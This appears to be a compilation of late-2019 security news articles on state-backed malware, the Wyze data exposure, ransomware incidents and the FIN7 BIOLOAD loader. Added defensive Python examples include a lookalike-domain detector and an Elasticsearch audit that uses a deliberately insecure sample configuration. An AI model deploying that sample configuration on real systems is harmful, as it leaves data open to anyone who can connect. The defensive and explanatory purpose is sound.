Samples of the KimJongRAT malware were observed dating back to 2010. The BabyShark malware is frequently sent to users as a malicious attachment to an email. The malware will drop a file with the file extension That file will then send a command that will beacon out to obtain an encoded script that is delivered back to the victim computer. - Microsoft

Microsoft confirmed these links in their Thallium complaint, saying that "in addition to targeting user's credentials, the Thallium defendants also utilize malware the most common being indigenous implants named 'BabyShark' and 'KimJongRAT' to compromise systems and steal data from victim systems."

"The Thallium defendants use misleading domains and Microsoft's trademarks to cause victims to click on the links that result in installation of this malware on the victims' computers," Microsoft adds.

"Once installed on a victim's computer, this malware exfiltrates information from the victim computer, maintains a persistent presence on the victim computer, and waits for further instructions from the Thallium."
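The complaint's description of misleading domains carrying Microsoft trademarks is the classic brand-impersonation pattern, and a mail gateway or SOC can score the domains behind incoming links for it. The following added example is not Microsoft's code; it uses a constructed allowlist and constructed test domains rather than the 50 seized domains, which are listed in Appendix A of the complaint and not reproduced here. The homoglyph table, the similarity threshold, and the assumption that the registrable label is the second-level label (no public-suffix handling for co.uk-style TLDs) are all assumptions of this example.

```python
from difflib import SequenceMatcher

# Constructed allowlist and brand tokens for this example; the real seized
# domains are in Appendix A of the complaint and are not reproduced on this page.
LEGIT_DOMAINS = ("microsoft.com", "outlook.com", "hotmail.com", "live.com", "onedrive.com")
BRAND_TOKENS = ("microsoft", "outlook", "hotmail", "onedrive")

# Single-character substitutions folded back to the letter they imitate.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})
# Multi-character substitutions ("rn" passes for "m", "vv" for "w").
DIGRAPHS = (("rn", "m"), ("vv", "w"))


def normalize_label(label: str) -> str:
    """Fold common lookalike tricks so 'micr0s0ft-login' compares as 'microsoftlogin'."""
    s = label.lower().translate(HOMOGLYPHS)
    for fake, real in DIGRAPHS:
        s = s.replace(fake, real)
    return s.replace("-", "")


def classify_domain(domain: str) -> str:
    """Return 'legit', 'lookalike', 'brand-in-subdomain' or 'unrelated'.

    Assumption: the registrable label is the second-level label, which holds for
    .com/.net/.org but not for co.uk-style suffixes (a public-suffix list would fix that).
    """
    d = domain.lower().rstrip(".")
    if any(d == legit or d.endswith("." + legit) for legit in LEGIT_DOMAINS):
        return "legit"
    labels = d.split(".")
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    norm = normalize_label(sld)
    for token in BRAND_TOKENS:
        # Brand embedded in the registrable label, or a near-miss such as 'microsft'.
        if token in norm or SequenceMatcher(None, norm, token).ratio() >= 0.8:
            return "lookalike"
    # Brand only in a subdomain (microsoft.com.secure-verify.net): the trademark
    # dresses up an unrelated registrable domain.
    if any(token in normalize_label(lab) for lab in labels[:-2] for token in BRAND_TOKENS):
        return "brand-in-subdomain"
    return "unrelated"


if __name__ == "__main__":
    # Constructed examples, not domains from the complaint.
    for d in ("login.microsoft.com", "micros0ft-login.com", "rnicrosoft.com",
              "microsft.com", "microsoft.com.secure-verify.net", "example.org"):
        print(f"{d:35} {classify_domain(d)}")
```

The allowlist check runs first so that genuine Microsoft hostnames are never scored; everything else is judged on its registrable label, and only then on subdomains, because attackers control the whole left-hand side of a domain they registered.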

Attacks targeting Microsoft customers
The North Korean state-sponsored Thallium was also previously mentioned by Redmond in July, when the company said that during the past year it had notified around 10,000 of its customers of being targeted or compromised by nation-state-backed threat groups.

"About 84% of these attacks targeted our enterprise customers, and about 16% targeted consumer personal email accounts," said Microsoft Corporate Vice President for Customer Security & Trust, Tom Burt at the time.

Other APT groups from Iran and Russia were also found to be behind these nation-state attacks against Microsoft customers, with threat actors such as Holmium and Mercury operating from Iran and two actors operating from Russia, tracked as Yttrium and Strontium (aka Fancy Bear or APT28), leaving their prints on some of these malicious campaigns.

While observing cyber-espionage campaigns, Microsoft detected attacks targeting the 2016 U.S. presidential election and the last French presidential elections, with U.S. senatorial candidates also being targeted in 2018 by the Russian-backed Strontium hacking group.

Seizing Phosphorus and Fancy Bear domains
"This is the fourth nation-state activity group against which Microsoft has filed similar legal actions to take down malicious domain infrastructure. Previous disruptions have targeted Barium, operating from China, Strontium, operating from Russia, and Phosphorus, operating from Iran," Burt added.

"These actions have resulted in the takedown of hundreds of domains, the protection of thousands of victims and improved the security of the ecosystem."

The Microsoft Threat Intelligence Center (MSTIC) previously spotted the state-sponsored Iranian cyber-espionage group it tracks as Phosphorus (aka APT35, Charming Kitten, or Ajax Security Team), which between August and September attempted to gain account information on over 2,700 customers, attacked 241 of them, and eventually compromised four of the attacked accounts.

Microsoft’s Digital Crimes Unit was able to block some of Phosphorus group's cyber attacks by taking over infrastructure domains used as part of their core operations, as court documents unsealed in March show.

By seizing 99 of the group's domains, Microsoft took over parts of the hacking group's operations and redirected traffic from infected devices to its sinkholes, thus collecting important information on the group's activity.

The company also previously filed 15 similar cases against Strontium in August 2018, which later led to the seizure of 91 of their domains.


Wyze Exposes User Data via Unsecured ElasticSearch Cluster
1.1.2020 
Bleepingcomputer  Incindent

Smart home tech maker Wyze Labs confirmed that the data of over 2.4 million of its users was exposed by an unsecured database connected to an Elasticsearch cluster for over three weeks, from December 4 to December 26.

The company discovered the incident after receiving an inquiry from an IPVM reporter via a "support ticket at 9:21 a.m. on December 26," immediately followed by IPVM publishing a piece "at 9:35 a.m" covering the exposed database discovered by security consulting firm Twelve Security.

However, as Dongsheng Song, Wyze's Co-Founder and Chief Product Officer said in a blog post, some of the reported information wasn't accurate.

"We do not send data to Alibaba Cloud. We don’t collect information about bone density and daily protein intake even from the products that are currently in beta testing," he said in response to Twelve Security's disclosure and IPVM's story. "We did not have a similar breach 6 months ago."

Troy Hunt (@troyhunt), 7:53 AM - Dec 27, 2019:
This one impacting @WyzeCam looks pretty serious. Original public disclosure (which looks like it may have been made prematurely) is here: https://blog.12security.com/wyze/ https://twitter.com/WyzeCam/status/1210369296511070209

Quoted tweet from Wyze (@WyzeCam), replying to @WyzeCam:
Everyone should be required to login to their Wyze app again due to a security precaution taken this afternoon. You can learn more here: https://forums.wyzecam.com/t/alleged-data-breach-12-26-2019/79046

Improperly secured database
The unsecured data was a copy of the company's production database containing a subset of all its users' info and it was created by Wyze to "measure basic business metrics like device activations, failed connection rates" by querying the number of connected devices, connectivity errors, and more.

"Queries such as these are expensive in terms of computer resources and they would have impacted your product experience significantly," Song explained. "For that reason, we created a separate database specifically for processing those heavier requests."

While the exposed database was initially properly configured to protect Wyze's customers, an employee mistakenly removed the security protocols while using it on December 4th.

"We locked down the database in question before we were able to verify it was exposed," Song added. "We did this as a precaution because the published article referenced a database connected to 'Elasticsearch': a search tool that we also used on our query database."

The information that Wyze had an exposed Elasticsearch cluster was also confirmed by Security Discovery researcher Bob Diachenko who said that the connected database contained 1,807,201,457 records including log data, API requests, and events.

Bob Diachenko (@MayhemDayOne), 12:21 AM - Dec 29, 2019:
As per my records, Wyze had huge Elasticsearch cluster publicly exposed. It included 1,807,201,457 records: log data, API requests and events. https://forums.wyzecam.com/t/updated-12-27-19-data-leak-12-26-2019/79046

Linked post on forums.wyzecam.com, "[Updated 12-27-19] Data leak 12-26-2019": "12-27-19 update On December 26th at around 10:00 AM, we received a report of a data leak. We immediately restricted database access and began an investigation. Today, we are confirming that some Wyze..."

Exposed Wyze user information
The Wyze CPO confirmed some of the details about the exposed information published in Twelve Security's December 26 report.

He stated that the unsecured database did contain customer emails and camera nicknames, WiFi SSIDs, Wyze device info, roughly 24,000 tokens associated with Alexa integrations, as well as body metrics including height, weight, gender, and other health info for a small number of product beta testers.

Wyze had the health info of 140 external beta testers stored within the exposed database as part of a limited new hardware beta test.

However, Song added that the database "did not contain user passwords or government-regulated personal or financial information," contradicting the info provided by Twelve Security in its report.

Additionally, Wyze's co-founder also said that "there is no evidence that API tokens for iOS and Android were exposed, but we decided to refresh them as we started our investigation as a precautionary measure."

Wyze (@WyzeCam), 6:32 AM - Dec 27, 2019, replying to @WyzeCam:
**12/26/19 9:00 PM PT** - We apologize for the delay and appreciate your patience with the difficulty using two-factor authentication. Adjustments to our 2FA service have been made and people running into the invalid phone number error should be able to log into the Wyze app now. If you are still having trouble logging into your app, please contact our customer support team. https://support.wyzecam.com/hc/en-us/requests/new

Regarding the impact of this security incident, Wyze advises its customers to be wary of future phishing attempts, since one or more third parties could now have their email addresses.

As a precautionary measure Wyze logged out all users by pushing a token refresh and "added another level of protection to our system databases (adjusted several permission rules and added a precaution to only allow certain whitelisted IPs access databases)."

As a direct result of these measures, all Wyze customers will have to log back in the next time they need to access their accounts and relink their Alexa, Google Assistant, or IFTTT integrations.
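The failure described above, a query database reachable without authentication after an employee removed its protections, is one that a configuration check can catch before an outsider does. The following added example is not Wyze's code or configuration: it audits a constructed elasticsearch.yml with security disabled and the node bound to every interface alongside a hardened version, using only settings that exist in 7.x-era Elasticsearch (network.host, xpack.security.enabled, xpack.security.http.ssl.enabled). The flat "dotted.key: value" parser is an assumption sufficient for how elasticsearch.yml is normally written; nested YAML would need a real YAML parser.

```python
# Constructed elasticsearch.yml fragments for this example (not Wyze's configuration).
WEAK_CONFIG = """
cluster.name: metrics-copy
network.host: 0.0.0.0          # reachable from every interface
http.port: 9200
xpack.security.enabled: false  # no authentication on the REST API
"""

HARDENED_CONFIG = """
cluster.name: metrics-copy
network.host: 10.0.5.12        # private interface only
http.port: 9200
xpack.security.enabled: true
xpack.security.http.ssl.enabled: true
"""

LOOPBACK = {"_local_", "127.0.0.1", "localhost", "::1", "[::1]"}
ALL_INTERFACES = {"0.0.0.0", "::", "[::]", "_global_"}


def parse_flat_yaml(text: str) -> dict:
    """Parse 'dotted.key: value' lines, dropping comments and surrounding quotes.
    Assumption: flat dotted keys only, the usual shape of elasticsearch.yml."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        settings[key.strip()] = value.strip().strip("'\"")
    return settings


def audit_elasticsearch(settings: dict) -> list:
    """Return findings for a node whose REST API is reachable without auth or TLS.
    Defaults assumed when a key is absent: network.host=_local_ (loopback only) and
    xpack.security.enabled=false, as on a 7.x basic-licence node."""
    host = settings.get("network.host", "_local_")
    auth_on = settings.get("xpack.security.enabled", "false").lower() == "true"
    tls_on = settings.get("xpack.security.http.ssl.enabled", "false").lower() == "true"
    findings = []
    if host in ALL_INTERFACES:
        findings.append("network.host binds every interface, including public ones")
    if host not in LOOPBACK and not auth_on:
        findings.append("REST API reachable beyond loopback with xpack.security.enabled=false: "
                        "anyone who can connect can read and write every index")
    if host not in LOOPBACK and not tls_on:
        findings.append("REST API served over plaintext HTTP")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        findings = audit_elasticsearch(parse_flat_yaml(cfg))
        print(f"{name}: {'no findings' if not findings else ''}")
        for f in findings:
            print("  -", f)
```

The check only sees what is in the node's own file. The IP allowlisting Wyze describes adding afterwards is a network-layer control (firewall rules or cloud security groups in front of the cluster) and is the right complement, since it holds even if someone edits this file again.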


Microsoft Outlook for the Web to Support Sending Email As Alias
29.12.2019 
Bleepingcomputer  IT

Microsoft is working on adding support for sending email from alias addresses (also known as aliases or proxy addresses) to Outlook on the web, its browser-based client.

After the feature's release, Office 365 customers will be able to send messages via Outlook on the web using any previously set up alias besides their primary SMTP address.

Email sender aliases support will prove useful for users who need to send emails from multiple branded domain names or on behalf of a specific company team or department.

Being able to choose any alias available on their account will also remove the hassle of setting up shared Office 365 mailboxes or creating additional POP or IMAP accounts.

Outlook on the web
Outlook on the web (Microsoft)
"So to kick-off our journey to provide you and your users with the flexibility to send email using an alias, we're excited to announce that soon Outlook on the web (aka OWA) will natively support the ability to choose the sender or FROM from a drop-down list right within the compose pane," says the planned feature's Microsoft 365 roadmap entry.

"And when the recipient receives that message, the FROM and REPLY TO will show that alias, regardless where the recipient's mailbox happens to live."

This new feature designed to allow Office 365 customers to send email from proxy addresses (aliases) from Outlook on the web is currently under development, with Microsoft planning to make it generally available in all Exchange environments during Q4 2020.

Additional Office 365 email improvements
In related news, Microsoft is working on adding the highly popular Outlook for Windows Message Recall feature to the Exchange Online hosted cloud email service for businesses.

Once it rolls out to all Office 365 environments during Q4 2020, the Message Recall feature will make it possible for users of Microsoft's cloud email to retrieve emails not yet opened by the recipients, regardless of the email client they use.

Redmond is also planning to add protection against Reply-All email storms in Exchange Online sometime during Q3 2020, an issue impacting Office 365 members of improperly locked down email distribution lists.

Reply-All storms (aka reply-allpocalypses) are huge chain reaction email sequences usually started by one of the members of a large email list who replies to the entire list using the "Reply All" feature. This can lead to accidental Distributed Denial of Service (DDoS) incidents that could take down some of the email servers used to deliver the numerous replies.

Another feature dubbed 'Unverified Sender' designed to help Office 365 users identify potential spam or phishing emails that reached their Outlook inbox is also currently under development.

Last but not least, Microsoft is currently enhancing the way emails sent using the Office 365 Message Encryption (OME) service are seen by mail servers with the end goal of making them a lot less likely to be marked as spam and automatically sent to the Trash folder.


Criminals Pull Hard Before Xmas, Attack U.S. Health Industry
29.12.2019 
Bleepingcomputer  Attack

Attackers are taking no breaks and actually pull harder before holidays, as shown by a San Antonio mental health services provider and a New Mexico hospital impacted by malware attacks according to reports and disclosures published before Christmas.

San Antonio's The Center for Health Care Services (CHSC) shut down computing systems for all its clinics in response to a larger-scale cyber-attack that took place last week.

Roosevelt General Hospital (RGH), the other healthcare organization affected, disclosed that it discovered malware on one of its digital imaging servers containing patient info, on November 14.

Mental health provider takes down systems
The CHSC provides various mental health services to adults and children with "mental health conditions, substance use challenges and intellectual or developmental disabilities" from San Antonio, Texas.

As CEO Jelynne LeBlanc Burley told the San Antonio Express-News, the incident that forced CHSC to shut down computing systems in all its clinics is currently being investigated by both the U.S. Federal Bureau of Investigation (FBI) and the Secret Service, as it is part of a series of attacks targeting multiple organizations.

The infection was isolated to a single system by CHSC's IT team after law enforcement agents alerted them of the attack last week.

"Now we’re in the process of bringing back our system," Burley said at the time. "We started at our larger clinics, and we’re bringing it up slowly and carefully to ensure that our security is still intact."

Patients encouraged to monitor credit reports
New Mexico's RGH issued a security incident notice on December 23 to disclose a malware infection that affected one of its radiology servers last month, on November 14.

According to the notification, 500 medical records including "names, addresses, date of birth, driver’s license numbers, Social Security numbers, phone numbers, insurance information, medical information and gender" were exposed in the incident.

"Although it has not been confirmed that the compromise of any data actually occurred, RGH is alerting potentially affected patients and offering assistance in monitoring their information," the alert adds.

Right after the malware was detected, the hospital's IT experts secured and restored the impacted server, while also making sure that all patient info was recovered.

Although we are continuing our investigation, there is no evidence at this time that any patient data has been wrongfully used. The malware identified on the radiology server was contained and terminated immediately upon detection. This breach did not affect our electronic health record system or billing system. - Kaye Green, CEO

"With security events such as this one, time was taken to thoroughly investigate what occurred and identify individuals who have been affected," RGH Marketing and Public Relations Director Jeanette Orrantia said.

"Since then, the server has been secured and patient information has been restored. Health and Human Services was notified within the 60-day reporting timeframe."

RGH also recommends all patients that received a security incident notification from the hospital to proactively monitor their credit reports for potential fraud attempts.

Tens of thousands affected by breaches in December
The Colorado Department of Human Services, Sinai Health System, Cheyenne Regional Medical Center, Children's Hope Alliance, and RiverKids Pediatric Home Health are only a handful of the healthcare providers that reported data breaches during December alone.

Just in these five incidents, the protected health information (PHI) of tens of thousands of individuals was exposed per reports filed with the U.S. Department of Health and Human Services Office for Civil Rights.

According to Emsisoft's 2019 ransomware report, 759 healthcare providers were impacted by ransomware attacks alone during 2019, with serious consequences:

• Emergency patients had to be redirected to other hospitals.
• Medical records were inaccessible and, in some cases, permanently lost.
• Surgical procedures were canceled, tests were postponed and admissions halted.
As proof of how easy it is to find a way into health industry entities' systems, the ꓘamerka Internet of Things/Industrial Control Systems reconnaissance tool can generate an interactive map of exposed healthcare devices.

Once an attacker gains access to one system within a healthcare provider's network, this could lead to severe consequences including data breaches, ransomware infections, and even people having their lives endangered.


U.S. Coast Guard Says Ryuk Ransomware Took Down Maritime Facility
29.12.2019 
Bleepingcomputer  Ransomware

The U.S. Coast Guard (USCG) published a marine safety alert to inform of a Ryuk Ransomware attack that took down the entire corporate IT network of a Maritime Transportation Security Act (MTSA) regulated facility.

While the incident is still being investigated, the USCG says that a phishing email is most likely the point of entry into the MTSA facility's network.

"Once the embedded malicious link in the email was clicked by an employee, the ransomware allowed for a threat actor to access significant enterprise Information Technology (IT) network files, and encrypt them, preventing the facility’s access to critical files," says the USCG.

The USCG issued another safety alert in July with cybersecurity guidance after a cyber incident experienced by a deep draft vessel during February affected the ship's entire network.

Just as in the July alert, the USCG once again reminds maritime stakeholders to closely check the validity of the sender before replying to or opening unsolicited emails.

Operations shut down for over 30 hours
Even though the Marine Safety Information Bulletin (MSIB) doesn't mention the type of facility or its name, it's safe to assume that it must be a port seeing that the ransomware managed to infiltrate cargo transfer industrial control systems.

"The virus further burrowed into the industrial control systems that monitor and control cargo transfer and encrypted files critical to process operations," adds the USCG.

According to the bulletin, the encryption impacted the facility's "entire corporate IT network (beyond the footprint of the facility)" as well as its physical access control and camera systems, and it also led to a "loss of critical process control monitoring systems."

On the whole, the attack forced the company to completely shut down operations for more than 30 hours during the cyber-incident response phase.

The Coast Guard recommends facilities utilize the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) and NIST Special Publication 800-82 when implementing a Cyber Risk Management Program. - USCG

Ransomware and breach mitigation measures
The USCG provides the following measures to limit future MTSA facility breaches and reduce recovery times:

• Intrusion Detection and Intrusion Prevention Systems to monitor real-time network traffic
• Industry-standard and up to date virus detection software
• Centralized and monitored host and server logging
• Network segmentation to prevent IT systems from accessing the Operational Technology (OT) environment
• Up-to-date IT/OT network diagrams
• Consistent backups of all critical files and software

UK's National Cyber Security Centre also published an advisory in June detailing Ryuk Ransomware campaigns targeting organizations around the globe, including guidance on how to protect against ransomware attacks.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued its own advisory on how to prevent and respond to ransomware infections, as well as advice on what to do after a ransomware infection.

To make matters worse for individuals and organizations affected by a Ryuk Ransomware attack, it has recently been discovered that this strain's decryptor has a bug that could lead to data loss in large files.

Therefore, Ryuk victims should always consider backing up all of their encrypted data before decryption, to protect it if the decryptor corrupts it.


Ransomware Hits Maastricht University, All Systems Taken Down
29.12.2019 
Bleepingcomputer  Ransomware

Maastricht University (UM) announced that almost all of its Windows systems have been encrypted by ransomware following a cyber-attack that took place on Monday, December 23.

UM is a university in the Netherlands with over 18,000 students, 4,400 employees, and 70,000 alumni; it has been placed in the top 500 universities in the world by five ranking tables in the last two years.

"Maastricht University (UM) has been hit by a serious cyber attack," the university announced on Christmas Eve, December 24.

"Almost all Windows systems have been affected and it is particularly difficult to use e-mail services. UM is currently working on a solution."

It is currently unknown if scientific data was also accessed or exfiltrated by the attackers during the attack, prior to the systems getting encrypted with the yet unnamed ransomware strain.

Extra security measures have been taken to protect (scientific) data. UM is investigating if the cyber attackers have had access to this data. - UM

All systems shut down temporarily
In an update published today, UM says that all the university's systems have been taken down as a precautionary measure during investigations.

"In order to work as safely as possible, UM has temporarily taken all of its systems offline," the update says. "Everything is aimed at giving students and employees access to the systems as soon as possible, possibly in phases."

However, seeing that the attack affected the vast majority of UM's computing systems, the time needed to restore all the impacted computers cannot yet be estimated.

"For the same reason, it is not possible to state with absolute certainty, which systems have been affected and which have not," UM adds. "This requires additional investigation."

The Executive Board and the deans of the faculties deeply regret the inconvenience this is causing for both students and staff. In the days to come, they want to see in what way students and staff who are experiencing problems due to this situation can be accommodated. - UM

At this time, UM's IT staff and external security specialists are working on repairing the affected systems and are also running a forensic investigation of the cyber-attack. The attack has also been reported to law enforcement as required by regulations in the Netherlands.

According to UM, the main focus right now is to make sure that the university's systems will be protected in the event of a future attack.

UM also says that employees and students can reach out to the ICT Servicedesk with questions related to the attack by sending an e-mail to info@m-u.nl from their private e-mail accounts or by calling 043 38 85 101 today during office hours.

BleepingComputer asked Maastricht University for comment and for extra details regarding the ransomware attack but did not hear back at the time of publication.


FIN7 Hackers' BIOLOAD Malware Drops Fresher Carbanak Backdoor
29.12.2019 
Bleepingcomputer  CyberCrime  Virus

Malware researchers have uncovered a new tool used by the financially-motivated cybercriminal group known as FIN7 to load fresher builds of the Carbanak backdoor.

Dubbed BIOLOAD, the malware loader has a low detection rate and shares similarities with BOOSTWRITE, another loader recently identified to be part of FIN7's arsenal.

Abusing legitimate Windows methods
The malware relies on a technique called binary planting that abuses a method used by Windows to search for DLLs required to load into a program. An attacker can thus increase privileges on the system or achieve persistence.

Fortinet's enSilo endpoint security platform blocked malicious payloads in legitimate Windows processes. More precisely, it detected a malicious DLL in FaceFodUninstaller.exe that exists on clean OS installations starting Windows 10 1803.

"What makes this executable even more attractive in the eyes of an attacker is the fact that it is started from a built-in scheduled task named FODCleanupTask, thereby minimizing the footprint on the machine and reducing the chances of detection even further" - Fortinet

The attacker places the malicious WinBio.dll in the "\System32\WinBioPlugIns" folder, which is home of the legitimate DLL 'winbio'.

Fortinet found similarities between BIOLOAD and BOOSTWRITE, an in-memory-only dropper previously analyzed by FireEye. Both loaders run in memory only, and both carry an encrypted payload DLL embedded in the loader itself.

Similar to newer FIN7 loader
According to Fortinet's analysis, the BIOLOAD samples were compiled in March and July 2019, while BOOSTWRITE's date is from May.

The researchers also noticed some differences. One is that BIOLOAD does not support multiple payloads; another is the use of XOR to decrypt the payload instead of the ChaCha cipher.

Connecting to a remote server for the decryption key also does not happen with BIOLOAD because it is customized for every victim system and derives the decryption key from its name.

Despite having been compiled nine months ago, BIOLOAD remains largely undetected. At the time of writing, only nine out of 68 antivirus engines on the VirusTotal scanning platform recognize the WinBio.dll as malicious.

As for the payload dropped on compromised systems, it is a newer version of the Carbanak backdoor, with timestamps from January and April 2019.

A significant change in these samples is that they check for more antivirus solutions running on the infected machines than previous ones, which checked only for Kaspersky, AVG, and TrendMicro.

Based on code similarities, techniques and backdoor used, Fortinet attributes BIOLOAD to the FIN7 cybercrime group. Based on the malware compilation dates and its behavior, the researchers believe that this loader is a precursor of BOOSTWRITE.

The malware identified by the researchers shows that FIN7 is actively developing tools to drop their backdoors. While BIOLOAD was used to load Carbanak on an infected host, the more recent BOOSTWRITE loader was used to also deliver RDFSNIFFER, a remote access tool "to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions."


How to Run Classic and Chromium Microsoft Edge Side-by-Side
29.12.2019 
Bleepingcomputer  Security

In January, Microsoft will ship a Windows Update on all versions of Windows 10 to replace the classic Edge with the Chromium-powered Edge browser. The migration happens during a Windows Update and the new Edge hides the old Edge after the update completes.

Microsoft says the update will only hide the browser on Windows 10 and the classic version of the browser won't be removed, at least for now. For businesses and those who need it, there will be a new way to launch classic Edge after the Chromium Edge is installed.

According to Microsoft, you can run both versions of the browser side-by-side but system-wide tweaks are required.

Group Policy

The workaround requires Group Policy Editor and it apparently works only on Windows 10 Pro and Enterprise.

Run Old and Chromium Microsoft Edge side-by-side
Open Start menu or Search, and type Group Policy Editor.
In Group Policy editor, navigate to Computer Configuration.
Under Computer Configuration, navigate to Administrative Templates > Microsoft Edge Update > Applications.
Under Applications, select "Allow Microsoft Edge Side by Side browser experience."
Click Edit policy setting.
Select Enabled.
Click OK.
Users with Windows 10 Home cannot restore the classic Edge because the workaround requires the Group Policy Editor, which isn’t available on Windows 10 Home.


Mozilla Adds Additional DNS-Over-HTTPS Provider to Firefox
28.12.2019 
Bleepingcomputer  Security

Mozilla has added an additional DNS provider to its DNS-Over-HTTPS implementation in Firefox. This gives Firefox users more options as to which DoH provider they use for secure DNS lookups.

When Mozilla announced that they would be testing the DoH implementation solely with Cloudflare DNS servers, users were concerned that using a single provider decreased user's privacy and gave that provider too much data about Firefox's users.

In a blog post, Firefox has announced that they have vetted NextDNS through their Trusted Recursive Resolver Program and that they will be an additional DoH provider that users can select in Firefox. The Trusted Recursive Resolver Program requires DNS providers to adhere to certain security and privacy practices before being approved by Mozilla.

“For most users, it’s very hard to know where their DNS requests go and what the resolver is doing with them.” said Eric Rescorla, Firefox CTO. “Firefox’s Trusted Recursive Resolver program allows Mozilla to negotiate with providers on your behalf and require that they have strong privacy policies before handling your DNS data. We’re excited to have NextDNS partner with us in our work to put people back in control of their data and privacy online.”

NextDNS does not currently appear in the stable version of Firefox 71 or Firefox Beta 72, but does appear as an option in Firefox Nightly 73.

In Firefox Nightly 73, if users go to the Firefox options > General > Settings under Network Settings > Enable DNS over HTTPS, they can now select NextDNS as a DoH provider.

NextDNS as a DoH Provider in Firefox
Giving users more options and choices is a far better approach than testing with a single provider as it not only offers better privacy to Firefox users but lets them choose who they wish to resolve their DNS requests.

Personally, I prefer Google's approach to DoH, which first attempts to use the user's existing DNS provider over DoH and, if that provider does not support the protocol, falls back to normal DNS resolution.

This allows the user to continue using their ISP's DNS servers who they already feel comfortable using.
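Whichever resolver a user picks, what that resolver receives is the ordinary DNS wire format (RFC 1035) carried in an HTTPS request body or a base64url query parameter, as specified by RFC 8484. The following is an added example, not Mozilla's, Firefox's or NextDNS's code: it builds the exact bytes a DoH client sends for an A-record lookup and parses a resolver response. The resolver URL and the response bytes are constructed sample values, not captured from any real provider.

```python
"""RFC 8484 DNS-over-HTTPS message construction and parsing (added example)."""
from __future__ import annotations

import base64
import struct

DOH_CONTENT_TYPE = "application/dns-message"
RESOLVER_URL = "https://doh.example.invalid/dns-query"  # constructed placeholder, not a real endpoint

QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """Encode a hostname as DNS labels: length byte + label, terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("idna")
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name: str, qtype: int = QTYPE_A, txid: int = 0) -> bytes:
    """Build a standard recursive query. RFC 8484 recommends txid 0 so that
    identical questions produce identical bodies and are cache-friendly."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def doh_get_url(name: str) -> str:
    """GET form of RFC 8484: ?dns=<base64url(query)> with '=' padding removed."""
    b64 = base64.urlsafe_b64encode(build_query(name)).rstrip(b"=").decode()
    return f"{RESOLVER_URL}?dns={b64}"


def read_name(msg: bytes, offset: int) -> tuple[str, int]:
    """Decode a name at offset, following compression pointers (0xC0xx).
    Returns (name, offset just past the name as it appears in the message)."""
    labels: list[str] = []
    jumped, end, hops = False, offset, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:  # pointer into an earlier part of the message
            if not jumped:
                end = offset + 2
            offset = ((length & 0x3F) << 8) | msg[offset + 1]
            jumped = True
            hops += 1
            if hops > 16:  # refuse malformed responses with pointer loops
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            if not jumped:
                end = offset
            return ".".join(labels), end
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def parse_response(msg: bytes) -> dict:
    """Return transaction id, rcode, the question name and the IN A answers."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000:
        raise ValueError("not a response (QR bit clear)")
    offset, qname = 12, None
    for _ in range(qd):
        qname, offset = read_name(msg, offset)
        offset += 4  # skip QTYPE + QCLASS
    answers = []
    for _ in range(an):
        rname, offset = read_name(msg, offset)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
            answers.append({"name": rname, "ttl": ttl, "address": ".".join(map(str, rdata))})
    return {"txid": txid, "rcode": flags & 0x000F, "question": qname, "answers": answers}


# Constructed sample response body for an A query on example.com: one answer whose
# name is a compression pointer to offset 12, TTL 300, address 93.184.216.34.
SAMPLE_RESPONSE = (
    build_query("example.com")[:2]                     # same txid (0) as the query
    + struct.pack("!HHHHH", 0x8180, 1, 1, 0, 0)        # QR=1 RD=1 RA=1; 1 question, 1 answer
    + encode_name("example.com") + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    + b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, 300, 4) + bytes([93, 184, 216, 34])
)

if __name__ == "__main__":
    print("POST body (hex):", build_query("example.com").hex())
    print("GET URL:", doh_get_url("example.com"))
    print("parsed:", parse_response(SAMPLE_RESPONSE))
```

The POST body is sent with `Content-Type: application/dns-message`; the same bytes sent over UDP port 53 are a classic DNS query, which is the whole point of the privacy discussion: DoH changes who can see the question in transit, not what the resolver learns.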


Ryuk Ransomware Stops Encrypting Linux Folders
28.12.2019 
Bleepingcomputer  Ransomware

A new version of the Ryuk Ransomware was released that will purposely avoid encrypting folders commonly seen in *NIX operating systems.

After the City of New Orleans was infected by ransomware, BleepingComputer confirmed that the city was infected by the Ryuk Ransomware using an executable named v2.exe.

After analyzing the v2.exe sample, security researcher Vitali Kremez shared with BleepingComputer an interesting change in the ransomware; it would no longer encrypt folders that are associated with *NIX operating systems.

Blacklist *NIX Folders
The list of Ryuk blacklisted *NIX folders are:

bin
boot
Boot
dev
etc
lib
initrd
sbin
sys
vmlinuz
run
var
At first glance, it seems strange that a Windows malware would blacklist *NIX folders when encrypting files.

Even stranger, Kremez told us that he has been asked numerous times whether there was a Unix variant of Ryuk as data stored in these operating systems have been encrypted in Ryuk attacks.

A Linux/Unix variant of Ryuk does not exist, but Windows 10 does contain a feature called the Windows Subsystem for Linux (WSL) that allows you to install various Linux distributions directly in Windows. These installations utilize folders with the same blacklisted names as listed above.

With the rising popularity of WSL, the Ryuk actors likely encrypted a Windows machine at some point that also affected the *NIX system folders used by WSL. This would have caused these WSL installations to no longer work.

